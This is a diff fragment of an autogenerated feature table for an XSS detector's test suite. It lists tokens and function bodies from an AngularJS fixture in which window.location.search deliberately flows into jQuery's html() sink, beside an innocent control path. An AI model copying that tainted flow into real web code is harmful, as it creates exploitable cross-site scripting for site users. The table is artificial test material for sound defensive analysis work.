autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:75:170:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocen ... Service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocen ... Service | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocen ... Service | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocen ... Service | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocen ... Service | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocentSourceService | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocentSourceService | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocentSourceService | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocentSourceService | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:168:84:168:104 | innocentSourceService | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:13 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:13 | $ | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:13 | $ | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:13 | $ | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:13 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | $("
    ") | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | exceptional return of $("
    ") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | exceptional return of $("
    ") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | exceptional return of $("
    ") | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | exceptional return of $("
    ") | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:22 | exceptional return of $("
    ") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:27 | $("
    ").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:27 | $("
    ").html | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:27 | $("
    ").html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:27 | $("
    ").html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:27 | $("
    ").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:52 | $("
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:52 | $("
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:13:169:52 | exceptional return of $("
    " | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:169:15:169:21 | "
    " | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:169:15:169:21 | "
    " | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16741,6 +115849,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:169:15:169:21 | "
    " | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:169:15:169:21 | "
    " | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:169:15:169:21 | "
    " | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:24:169:27 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:24:169:27 | html | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:169:24:169:27 | html | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:24:169:27 | html | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:24:169:27 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:49 | innocen ... Service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:49 | innocen ... Service | contextSurroundingFunctionParameters | ()\n(innocentSourceService) | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:49 | innocen ... Service | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:49 | innocen ... Service | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:49 | innocen ... Service | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | exceptional return of innocen ... rvice() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | exceptional return of innocen ... rvice() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | exceptional return of innocen ... rvice() | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | exceptional return of innocen ... rvice() | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | exceptional return of innocen ... rvice() | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16748,6 +115871,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:169:29:169:51 | innocen ... rvice() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:171:10:171:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:171:10:171:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:171:10:171:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:171:10:171:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:171:10:171:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16755,6 +115883,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:171:18:171:40 | "innoce ... ervice" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:171:42 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:171:42 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:171:42 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:171:42 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:171:42 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:171:43:173:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
